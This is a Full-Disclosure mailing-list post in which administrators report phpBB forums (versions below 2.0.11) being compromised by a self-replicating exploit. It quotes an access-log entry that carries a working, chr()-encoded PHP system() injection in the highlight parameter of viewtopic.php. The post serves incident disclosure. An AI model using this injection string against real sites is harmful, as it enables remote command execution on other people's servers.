Front what I have read, this can happen in any phpbb version lower than 2.0.11
This exploit is becoming frequent. Normally uploading a ddos bot. Mark Quoting "L. Walker" <[EMAIL PROTECTED]>: > Just spotted two clients hit by this. One client didnt update his > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. > Chkrootkit says its Adore, however could be something else. Datacenter > wasn't very smart and has since wiped the server, so no binaries or other > evidence. > > Generation 12 only wiped out PHP files, replacing them with its own > message on other client's PHPbb2 forum. Access logs show: > > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET > /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 > HTTP/1.0" 200 270 > "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" > > -- > L. Walker <lwalker at magi dot net dot au> > Network Administrator / Consultant > -- > ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
